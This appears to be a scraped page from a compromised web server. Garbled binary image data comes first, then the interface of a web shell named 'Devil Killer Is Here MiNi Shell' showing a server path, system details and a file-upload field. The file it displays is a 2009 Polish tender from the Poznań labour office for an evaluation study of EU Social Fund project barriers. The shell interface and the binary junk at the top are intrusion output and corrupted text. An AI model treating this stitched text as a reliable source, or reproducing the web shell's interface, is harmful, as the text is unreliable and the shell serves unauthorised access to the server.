JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090209/35003-N-2009.html

<p class="kh_header"><b>Poznań: Przeprowadzenie badania ewaluacyjnego pt. Bariery i problemy w realizacji projektów finansowanych z EFS w województwie wielkopolskim</b><br>
<b>Numer ogłoszenia: 35003 - 2009; data zamieszczenia: 09.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 061 8463819, faks 061 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie badania ewaluacyjnego pt. Bariery i problemy w realizacji projektów finansowanych z EFS w województwie wielkopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyłonienie Wykonawcy w zakresie Przeprowadzenia badania ewaluacyjnego pt: Bariery i problemy w realizacji projektów finansowanych z EFS w województwie wielkopolskim
Wstęp
Program Operacyjny Kapitał Ludzki stanowi odpowiedź na wyzwania, jakie przed państwami członkowskimi UE, w tym również Polską, stawia odnowiona Strategia Lizbońska. Do wyzwań tych należą: uczynienie z Europy bardziej atrakcyjnego miejsca do lokowania inwestycji i podejmowania pracy, rozwijanie wiedzy i innowacji oraz tworzenie większej liczby trwałych miejsc pracy. Zgodnie z założeniami Strategii Lizbońskiej oraz celami polityki spójności krajów unijnych, rozwój kapitału ludzkiego i społecznego przyczynia się do pełniejszego wykorzystania zasobów pracy oraz wsparcia wzrostu konkurencyjności gospodarki.

Dążąc do efektywnego rozwoju zasobów ludzkich, Program koncentruje wsparcie na następujących obszarach: zatrudnienie, edukacja, integracja społeczna, rozwój potencjału adaptacyjnego pracowników i przedsiębiorstw, a także na zagadnieniach związanych z rozwojem zasobów ludzkich na terenach wiejskich, budową sprawnej 
i skutecznej administracji publicznej wszystkich szczebli, wdrażaniem zasady dobrego rządzenia oraz promocją zdrowia zasobów pracy.

Celem głównym Programu jest: umożliwienie pełnego wykorzystania potencjału zasobów ludzkich, poprzez wzrost zatrudnienia i potencjału adaptacyjnego przedsiębiorstw i ich pracowników, podniesienie poziomu wykształcenia społeczeństwa, zmniejszenie obszarów wykluczenia społecznego oraz wsparcie dla budowy struktur administracyjnych państwa.

Program składa się z 10 Priorytetów, realizowanych zarówno na poziomie centralnym jak i regionalnym. W ramach komponentu centralnego środki zostaną przeznaczone przede wszystkim na wsparcie efektywności struktur i systemów instytucjonalnych, natomiast środki komponentu regionalnego zostaną przeznaczone na wsparcie dla osób i grup społecznych.

W województwie wielkopolskim funkcję Instytucji Pośredniczącej pełni Wojewódzki Urząd Pracy w Poznaniu.

Priorytet VI (Rynek pracy otwarty dla wszystkich) obejmuje działania związane 
z aktywizacją zawodową osób bezrobotnych i biernych zawodowo. Pomoc kierowana jest m.in. do osób młodych, kobiet, osób starszych i niepełnosprawnych oraz osób długotrwale bezrobotnych. W ramach Priorytetu VI znajdują się działania prowadzące do zmniejszenia bezrobocia ukrytego, dotykającego najbardziej mieszkańców obszarów wiejskich. Pomoc skoncentrowana jest na podnoszeniu zdolności do zatrudnienia (m.in. poprzez doradztwo zawodowe i szkolenia), rozwoju przedsiębiorczości i szkoleniach oraz na podniesieniu jakości usług świadczonych przez instytucje rynku pracy. 

Priorytet VII (Promocja integracji społecznej) ma na celu ułatwienie dostępu do rynku pracy osobom zagrożonym wykluczeniem społecznym oraz rozwój instytucji ekonomii społecznej. Grupami docelowymi są osoby niepełnosprawne, długotrwale bezrobotne, imigranci, osoby opuszczające zakłady karne. Wsparcie przeznaczone jest na wyeliminowanie barier, jakie napotykają te grupy w dostępie do zatrudnienia, na tworzenie warunków sprzyjających zatrudnieniu oraz na podniesienie kwalifikacji kadr instytucji pomocy i integracji społecznej. 

W ramach Priorytetu VIII (Regionalne Kadry Gospodarki) wsparciem objęte są przedsiębiorstwa i pracownicy w nich zatrudnieni, którym zapewni się możliwość podnoszenia i aktualizacji umiejętności zawodowych. Ważnym elementem wsparcia jest także rozwój Regionalnych Strategii Innowacji oraz zapewnienie transferu wiedzy między przedsiębiorstwami a jednostkami naukowo-badawczymi.

Priorytet IX (Rozwój wykształcenia i kompetencji w regionach) kładzie nacisk na dostęp do edukacji oraz wyrównanie szans edukacyjnych. Działania obejmują upowszechnienie edukacji przedszkolnej (głownie na obszarach wiejskich), programy rozwojowe szkół (np. dodatkowe zajęcia pozalekcyjne), dostosowanie wiedzy i umiejętności absolwentów do potrzeb lokalnego rynku pracy, rozwijanie szkolnictwa zawodowego, programy stypendialne, upowszechnienie kształcenia ustawicznego oraz rozwój kadr pedagogicznych i administracyjnych systemu oświaty. 

Program Operacyjny Kapitał Ludzki finansowany jest w 85% ze środków Unii Europejskiej (Europejskiego Funduszu Społecznego) oraz w 15% ze środków krajowych. Całość kwoty, jaką przewidziano na realizację Programu, wynosi prawie 11,5 mld euro, w tym wkład finansowy Europejskiego Funduszu Społecznego to ponad 9,7 mld euro.

Za efekty realizacji założeń komponentu regionalnego PO KL odpowiedzialny jest Wydział Funduszy Unii Europejskiej Wojewódzkiego Urzędu Pracy w Poznaniu, który monitoruje wdrażanie komponentu regionalnego i realizację założonych wskaźników oraz osiągnięty poziom alokacji w rozbiciu na poszczególne lata realizacji PO KL w Wielkopolsce. W Instytucji Pośredniczącej dla komponentu regionalnego PO KL w województwie wielkopolskim struktura organizacyjna jest ściśle związana ze specyfiką Programu Operacyjnego. W ramach struktury Wydziału funkcjonują cztery Oddziały dla poszczególnych Priorytetów komponentu regionalnego PO KL oraz Oddziały: Koordynacji i Kontroli. W ramach poszczególnych Oddziałów dla Priorytetów VI-IX działają Referaty ds.: ogólnej obsługi projektów oraz ds. finansowych. Natomiast na Oddział Koordynacji składa się pięć Referatów ds.: programowania, refundacji i prognoz finansowych, ewaluacji i monitoringu, promocji 
i informacji, pomocy technicznej i projektów własnych. 

Cele badania 
Główne cele badania ewaluacyjnego to: 
-Identyfikacja barier utrudniających podmiotom aplikowanie o dofinansowanie ze środków EFS oraz problemów występujących w trakcie realizacji projektów
-Identyfikacja obszarów i etapów realizacji, w których występują wąskie gardła systemowe, bądź, które są zagrożonych ich występowaniem w przyszłości
-Zdefiniowanie środków zaradczych ułatwiających aplikowanie o  dofinansowanie z EFS oraz umożliwiających wyeliminowanie utrudnień w trakcie realizacji projektów.
Ewaluator jest zobowiązany do przebadania podmiotów takich jak: Beneficjenci realizujący projekt/projekty z EFS w ramach PO KL, Beneficjenci, którzy zrealizowali już projekt/projekty z EFS w ramach PO KL, podmioty nieskutecznie ubiegające się 
o dofinansowanie oraz podmioty, które nigdy nie aplikowały o środki z EFS. Ponadto, w badaniu wezmą udział członkowie IP oraz przedstawiciele RO EFS.

Od wykonawcy oczekuje się zaproponowania celów szczegółowych korespondujących z głównymi  celami badania  oraz uzyskania odpowiedzi na dodane oraz poniższe pytania ewaluacyjne:

-Na jakim etapie aplikowania o środki z EFS występują bariery? Jakiego rodzaju są to bariery?
-Na jakim etapie realizacji projektów współfinansowanych z EFS występują bariery? Jakiego rodzaju są to problemy?
-Na którym etapie: ubiegania się o dofinansowanie z środków EFS czy podczas realizacji projektów występuje najwięcej zagrożeń?
-Czy na poziomie aplikowania o środki z EFS występują bariery proceduralne?
-Czy na etapie aplikowania o środki z EFS występują bariery związane 
z funkcjonowaniem lub działaniami podejmowanymi przez IP?
-Jaki wpływ na gotowość do aplikowania o środki z EFS mają procedury obowiązujące projektodawców?
- Skąd projektodawcy czerpią wiedzę ułatwiającą aplikowanie o środki z EFS?  Czy ta wiedza jest kompleksowa oraz sformułowana w jasny i przejrzysty sposób?
-Czy pojawiają się utrudnienia związane z działaniem IP, jeśli tak, to czy są trudne do przezwyciężenia oraz czy generują kolejne problemy w perspektywie realizacji projektu? W jaki sposób można im zapobiec?
-Jak kształtuje się w perspektywie czasowej rozkład barier? Czy więcej barier występuje na etapie aplikowania o środki z EFS czy też podczas realizacji projektów?
-Skąd Beneficjenci czerpią wiedzę na etapie realizacji projektów?
-Czy Beneficjenci realizujący projekty wiedzą gdzie szukać rozwiązań sytuacji problemowych?(dobre praktyki)
-Czy IP dysponuje dobrymi praktykami w zakresie rozwiązywania sytuacji problemowych lub pokonywania barier związanych z aplikowaniem o środki 
i realizacją projektów? Czy IP wypracowuje swoje własne dobre praktyki w tych obszarach?
-Czy IP udziela chętnie pomocy w rozwiązywaniu problemów zarówno na etapie aplikowania o środki jak i na etapie realizacji projektu?
-Czy w trakcie realizacji projektu Beneficjenci stykają się z dużą częstotliwością występowania barier? Jakie jest natężenie tych barier?
-Jakiego rodzaju Beneficjenci wymagają najwięcej czasu i pomocy w trakcie realizacji projektów finansowanych z EFS?
-Jaka jest skala Beneficjentów, którzy aplikują o środki więcej niż raz?
-Czy Beneficjenci realizujący powtórnie projekty z EFS nawet w ramach różnych Programów Operacyjnych wymagają równie dużego zaangażowania ze strony pracowników IP, jak Ci realizujący projekty po raz pierwszy?
-Które problemy z punktu widzenia IP są najpoważniejszymi barierami 
w aplikowaniu o środki z EFS?
-W jaki sposób można zminimalizować bariery, tak by wpłynąć na wzrost zainteresowania i skuteczność aplikowania o środki z EFS?
-Które Działania w ramach poszczególnych Priorytetów EFS cieszą się największym zainteresowaniem aplikujących o środki? Które Działania w ramach poszczególnych Priorytetów cieszą się najmniejszym zainteresowaniem i jakie są tego powody? Jakiego rodzaju czynniki sprzyjają/nie sprzyjają temu zainteresowaniu?
-W ramach, którego Działania jest największe zainteresowanie aplikowaniem 
o środki z EFS? W ramach którego Działania Beneficjenci najskuteczniej aplikują o środki z EFS?
-Jakie czynniki mają wpływ na skuteczność aplikowania o środki? (z punktu widzenia aplikujących i pracowników IP)
-Czy pojawiają się utrudnienia związane z działaniem IP, jeśli tak, to czy są trudne do przezwyciężenia oraz czy generują kolejne problemy w perspektywie realizacji projektu? W jaki sposób można im zapobiec?
-Jakiej wielkości podmioty najczęściej i najskuteczniej aplikują o środki z EFS? 
-W jaki sposób można pomóc małym przedsiębiorstwom w skutecznym aplikowaniu o środki z EFS? Jakie czynniki najbardziej ograniczają aktywność tych podmiotów?
-W jaki sposób IP może skutecznie zachęcić Beneficjentów do aplikowania 
o środki z EFS?
-Czy występujące bariery związane z aplikowaniem o środki są lub mogą się stać w najbliższej przyszłości wąskimi gardłami systemowymi? Czy ich skala 
i natężenie oraz konsekwencje są znaczne?
-Czy w trakcie realizacji projektów występują problemy, które są lub mogą się stać wąskimi gardłami systemowymi? Czy ich skala i natężenie oraz konsekwencje są znaczne?
-W jaki sposób można efektywnie niwelować i zapobiegać tworzeniu się wąskich gardeł systemowych?

Wykonawca powinien uzupełnić powyższą listę pytań o własne pytania badawcze.

W badaniu uwzględnione zostanie kryterium:
Skuteczność- kryterium to pozwoli ocenić Instytucję Pośredniczącą (WUP- WFUE) pod kątem niwelowania barier i problemów w pozyskiwaniu środków z EFS oraz realizacji projektów
Efektywność - kryterium to pozwoli ocenić poziom ekonomiczności Instytucji Pośredniczącej (WUP- WFUE) w procesie niwelowania barier w dostępie do środków z EFS oraz z ich wykorzystania 
Adekwatność - kryterium to pozowali określić czy właściwie zostały zidentyfikowane wąskie gardła w dostępie do środków z EFS oraz w racjonalnym wykorzystaniu tych środków.

Wyniki ewaluacji służyć będą wyeliminowaniu barier na etapie pozyskiwania środków z EFS oraz skutecznemu przeciwdziałaniu powstawania problemów występujących w trakcie realizacji projektów współfinansowanych w ramach komponentu regionalnego PO KL w Wielkopolsce. Badanie usprawni wdrażanie PO KL w regionie oraz polepszy dynamikę osiągania wskaźników.

Metodologia
Zamawiający wymaga zastosowania co najmniej następujących technik: 
1.	Desk research 1szt.
2.	Indywidualny wywiad pogłębiony IDI 80 osób (Projektodawcy)
-	Beneficjenci realizujący projekt/projekty z EFS w ramach PO KL, Beneficjenci, którzy zrealizowali już projekt/projekty z EFS w ramach PO KL
-	Podmioty nieskutecznie ubiegający się o dofinansowanie
-	Podmioty, które nigdy nie aplikowały o środki z EFS
3.	Zogniskowany wywiad grupowy (focus) FGI 1szt. (pracownicy IP, pracownicy  RO EFS województwa Wielkopolskiego)
4.	Studium przypadku 16 szt. (po 4 z każdego Priorytetu) 

Zamawiający wymaga zastosowania następujących metod doboru próby badawczej:
Ad.2 Próba warstwowa 
Ad.3 Próba losowa prosta
Ad.4 Próba celowa

Wykonawca może uzupełnić listę metod badawczych lub zaproponować jej  modyfikację (przy założeniu, że zabieg ten umożliwi skuteczniejsze pozyskanie odpowiedzi na pytania badawcze). Wykonawca może również zaproponować inne metody doboru próby, jednak kwestia ostatecznego wyboru zarówno metod doboru próby jak i poszczególnych technik badawczych pozostaje w gestii Zamawiającego.
Od wykonawcy wymaga się zastosowania analizy SWOT oraz przedstawienia metod analizy statystycznej uzyskanych danych.
Zamawiający wymaga, aby Wykonawca przedstawił model badania uwzględniający cele badania, pytania badawcze wraz z  przyporządkowanymi metodami i technikami badawczymi. Zaproponowana koncepcja badawcza musi korespondować 
z kryteriami ewaluacyjnymi przedstawionymi w dokumencie.

Harmonogram 
Zamawiający oczekuje od Wykonawcy terminowego i regularnego raportowania. 
Wykonawca zobowiązany jest do przedstawienia raportu wstępnego do 14 dni kalendarzowych od terminu podpisania umowy. Wykonawca zobowiązany jest do przedstawienia do konsultacji założeń raportu metodologicznego w terminie 7 dni kalendarzowych od daty podpisania umowy. Raport powinien zawierać dokładny opis narzędzi badawczych oraz proponowany sposób doboru próby. 
Wstępny raport końcowy powinien interpretować zebrane wyniki. Zestawienie 
i porównanie danych powinno być ujęte w tabelach porównawczych. Dla weryfikacji hipotez i oszacowania efektów należy zastosować metody statystyczne 
i porównawcze. 
We wstępnej wersji raportu końcowego należy przedstawić roboczą analizę  materiału badawczego uwzględniającą cele badania oraz wszystkie szczegółowe pytania ewaluacyjne. Oczekuje się, że raport ewaluacyjny będzie się kończył sformułowaniem wniosków i rekomendacji (w formie tabeli). 
W czasie pisania raportów z przeprowadzonego badania wskazane są konsultacje 
z Referatem ds. Ewaluacji i monitoringu WUP (może mieć to formę regularnych spotkań). Zamawiający będzie informowany o aktualnym stanie prac przez reprezentanta Wykonawcy, wybranego do kontaktu z Zamawiającym. 
Jednocześnie Zamawiający zaznacza, że terminy przekazania kolejnych raportów nie mogą ulec zmianie. 

Etapy realizacji badania	Termin realizacji
Przedstawienie raportu wstępnego, metodologicznego	Do 14 dni od terminu podpisania umowy 
Przedstawienie wstępnej wersji raportu końcowego 	Do 24 kwietnia 2009 r. 
Przedstawienie ostatecznej wersji raportu końcowego	Do 25 maja 2009 r. 

Raport końcowy powinien mieć następującą strukturę:
-	Streszczenie (10 stronicowe streszczenie głównych obserwacji, wniosków 
i rekomendacji);
-	Spis treści;
-	Wprowadzenie (opis przedmiotu badania, jego założeń i celów);
-	Opis zastosowanej metodologii (w tym opis próby badawczej);
-	Opis wyników badania ewaluacyjnego (analiza, interpretacja i prezentacja  wyników);
-	Wnioski i rekomendacje (przy każdym powinien znaleźć się odnośnik do konkretnej części raportu, czyli jego uzasadnienia w tekście; rekomendacje powinny być pogrupowane tematycznie oraz zawierać opis pożądanego stanu i propozycje sposobów osiągnięcia tego stanu; wyniki badania powinny być przedstawiane w formie tabeli, w której zamieszczone będą główne problemy 
i opis działań, które pozwoliłyby na rozwiązanie tych problemów. Rekomendacje powinny zawierać opis pożądanego stanu oraz propozycje sposobów osiągnięcia tego stanu. Zatem - powinny odpowiadać na następujące pytania: Jak powinna wyglądać rzeczywistość? / Jaka zmiana powinna zostać dokonana? Co należy zrobić, by osiągnąć pożądany stan? / Co należy zrobić, by przeprowadzić pożądaną zmianę?);
-	Aneksy (zestawienia i porównania danych, narzędzia badawcze, zastosowane źródła).

Raport końcowy wraz ze streszczeniem nie powinien liczyć więcej niż 70 stron i mieć formę publikacji. Powinien być napisany zwięzłym i przejrzystym językiem. Sugeruje się, aby każdy z rozdziałów kończył się krótkim podsumowaniem. Do raportu powinno być dołączone resume, w którym zebrane będą najistotniejsze wyniki i rekomendacje. Publikacja powinna być oprawiona w kartonową okładkę 250 g/m2.
Wykonawca powinien dostarczyć:
-	raport w wersji elektronicznej (e-mail, CD-ROM) i papierowej (10 egzemplarzy w formie publikacji);  
-	streszczenie najważniejszych wyników i rekomendacji (w przypadku wersji elektronicznej - w formie osobnego pliku);
-	streszczenie raportu w języku angielskim; 
-	prezentację multimedialną prezentującą wyniki badania (dodatkowo Wykonawca przedstawi wyniki badań oraz rekomendacje na spotkaniu wskazanym przez Zamawiającego).

Zakres dostępnych informacji
Badanie powinno się opierać na: analizie dokumentów programowych PO KL, statystykach publicznych, a także na danych uzyskanych za pomocą metod badawczych określonych w dokumencie lub dodatkowo zaproponowanych przez  Wykonawcę.
Wykonawca zobowiązany jest do korzystania z dodatkowych dokumentów/informacji, które mogę być niezbędne do prawidłowej realizacji badania. Niniejsze dokumenty powinny zostać określone i zgromadzone przez Wykonawcę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.	spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn.:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2.	Ocena spełnienia ww. warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o dokumenty, oświadczenia dołączone do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ustawy PZP i nie podleganiu wykluczeniu na podstawie art. 24 ustawy PZP, wedle wzoru stanowiącego załącznik nr 1 do formularza oferty; w przypadku, gdy ofertę składa kilka podmiotów dotyczy to każdego z nich;
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie, dotyczy to każdego z nich;
3. Aktualne na dzień składania ofert zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego o nie zaleganiu z opłatami oraz składkami na ubezpieczenie zdrowotne lub społeczne lub o uzyskaniu zgody na zwolnienie, odroczenie lub rozłożenie na raty zaległych opłat 
i składek (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich. 
4. Aktualne na dzień składania ofert zaświadczenie od właściwego naczelnika Urzędu Skarbowego o nie zaleganiu z opłacaniem podatków lub o uzyskaniu zgody na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
5. Wykonawca (w przypadku konsorcjum co najmniej jeden z Wykonawców)  musi wykazać, w formie załączonego do oferty oświadczenia,  że w ciągu ostatnich 3 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia wszczęcia postępowania o udzielenie zamówienia, wykonał, tj. zrealizował co najmniej dwie ewaluacje o charakterze zewnętrznym (niezależne od podmiotu ewaluacji, finansowane ze środków publicznych) oraz co najmniej jedno badanie społeczne (załącznik nr 3 do formularza oferty). Oświadczenie powinno zawierać nazwę i dane identyfikujące  zleceniodawców, opis zakresu zamówień, terminy ich wykonania oraz wartości. Ponadto powinno być potwierdzone stosownym dokumentem uprzedniego zleceniodawcy o należytym wykonaniu zamówienia. 
6. Wykonawca musi przedstawić wykaz osób lub podmiotów przewidzianych do wykonania przedmiotu zamówienia, tj. zespół zdolny do wykonania zamówienia poprzez załączenie listy osób i /lub podmiotów, które będą wykonywać zamówienie lub przewidzianych do jego realizacji, tzn. każdy członek zespołu powinien posiadać niezbędną wiedzę z zakresu PO KL lub programów finansowanych z EFS, potwierdzoną certyfikatem, dyplomem albo innym dokumentem poświadczającym uzyskaną wiedzę (załącznik nr 4 do formularza oferty).
7. Wykonawca musi przedstawić Kierownika projektu, który posiada minimum roczne doświadczenie na podobnym stanowisku tj. nadzorowanie badań, pełnienie obowiązków kierownika badań (załącznik nr 5 do formularza oferty).
8. Dokumenty, o których mowa w rozdziale 6) niniejszej specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentacji Wykonawcy.
9. Każdy z członków konsorcjum przedstawia dokumenty wymienione w niniejszym rozdziale pkt 1, 2, 3, 4, 5, 6. Dokumenty określone w rozdziale 6) pkt 7 przedstawia co najmniej jeden  z Wykonawców tworzących konsorcjum.
10. W przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą, w miejsce dokumentów, o których mowa w rozdziale 6) pkt 2, 3, 4, 6 SIWZ zobowiązany jest przedłożyć dokument lub dokumenty, wystawione w kraju, 
w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że: 
10.1 nie otwarto jego likwidacji ani nie ogłoszono upadłości, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); 
10.2 nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);
10.3 nie orzeczono wobec niego zakazu ubiegania się o zamówienie, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); 
- odpowiednio dla pkt  5 składa: 
